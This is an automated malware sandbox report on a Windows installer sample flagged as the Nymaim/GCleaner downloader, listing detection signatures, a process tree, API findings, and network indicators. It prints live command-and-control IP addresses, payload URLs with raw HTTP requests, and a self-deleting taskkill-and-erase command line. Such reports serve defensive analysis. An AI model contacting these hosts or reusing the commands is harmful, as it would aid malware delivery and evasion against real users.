Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:791306
MD5:209dca1a9633807b9cf36d6447f972da
SHA1:c4235ac91cd8e3c0e70ede54e43f857709f00859
SHA256:2004da2c60d73a66c6feffe50f130483750da799b90a78c76da90f61208101e6
Tags:exe
Infos:

Detection

Nymaim
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Obfuscated command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 408 cmdline: C:\Users\user\Desktop\file.exe MD5: 209DCA1A9633807B9CF36D6447F972DA)
    • file.tmp (PID: 3600 cmdline: "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe" MD5: D76329B30DB65F61D55B20F36B56DA26)
      • finalrecovery.exe (PID: 6024 cmdline: "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" MD5: 04947B1020E31A5F5A6E41FD279B4E74)
        • wEQg8.exe (PID: 5996 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 68 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 1336 cmdline: taskkill /im "finalrecovery.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
{"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

Yara matches (unpacked PE files):
Source | Rule | Description | Author | Strings
2.2.finalrecovery.exe.19a0000.3.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.finalrecovery.exe.400000.1.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.finalrecovery.exe.19a0000.3.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.finalrecovery.exe.400000.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
No Sigma rule has matched

Snort IDS alert:
Timestamp:01/25/23-10:17:06.150578
Source IP:45.12.253.72
Destination IP:192.168.2.3
Source Port:80
Destination Port:49702
SID:2852925
Protocol:TCP
Classtype:A Network Trojan was detected

              AV Detection

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe | ReversingLabs: Detection: 60%
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Joe Sandbox ML: detected
Source: 1.2.file.tmp.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.3.file.exe.23c75c8.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.file.tmp.4b375c.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.file.exe.21db608.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.file.tmp.4b375c.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045C5D8 ArcFourCrypt,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045C5F0 ArcFourCrypt,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_10001000 ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_10001130 ArcFourCrypt,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

              Compliance

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00423DAD FindFirstFileExW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_10007E39 FindFirstFileExW,

              Networking

Source: Traffic | Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49702
Source: Malware configuration extractor | IPs: 45.12.253.56
Source: Malware configuration extractor | IPs: 45.12.253.72
Source: Malware configuration extractor | IPs: 45.12.253.98
Source: Malware configuration extractor | IPs: 45.12.253.75
Source: Joe Sandbox View | ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View | IP Address: 45.12.253.72 45.12.253.72
Source: unknown | TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown | TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.253.72/default/puk.php
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.12.253.75/dll.php
Source: file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://nbafrog.com/
Source: is-6R8AD.tmp.1.dr | String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
Source: global traffic | HTTP traffic detected:
  GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: OK
  Host: 45.12.253.56
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /default/stuk.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: OK
  Host: 45.12.253.72
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /default/puk.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: OK
  Host: 45.12.253.72
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /dll.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: B
  Host: 45.12.253.75
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: file.exe, 00000000.00000002.324966224.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              Source: Yara match | File source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004083E4
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00466728
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0047EB9C
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0046F304
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0043D388
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004440A8
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045E468
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045A510
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004447A0
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004687A0
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00434900
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00430B40
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00444BAC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00484C90
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00450D1C
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00443B00
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00485BC4
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00433BFC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0048BECC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0042FFB4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004096E8
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004057C7
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00406800
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00406AA0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404D40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00405F40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00402F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00415053
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00415285
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00422329
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00419490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00409670
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004267D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404840
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004109D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_0042AB1A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00421C08
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_0042AC3A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00428CB9
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00447D2D
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_1000E111
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_1000FAC0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: String function: 10003100 appears 34 times
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: String function: 0040F960 appears 54 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00405964 appears 108 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00403400 appears 60 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00406AA4 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 0044540C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 004456DC appears 59 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 004526A4 appears 91 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00433B14 appears 32 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00456D64 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 004078D4 appears 43 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00456B58 appears 93 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00403494 appears 83 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00408BEC appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: String function: 00403684 appears 218 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0042F178 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00423B6C NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004125C0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004771E0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,
              Source: file.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: file.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: is-H9OSH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: is-H9OSH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: is-H9OSH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: is-H9OSH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: is-H9OSH.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              Source: finalrecovery.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "finalrecovery.exe")
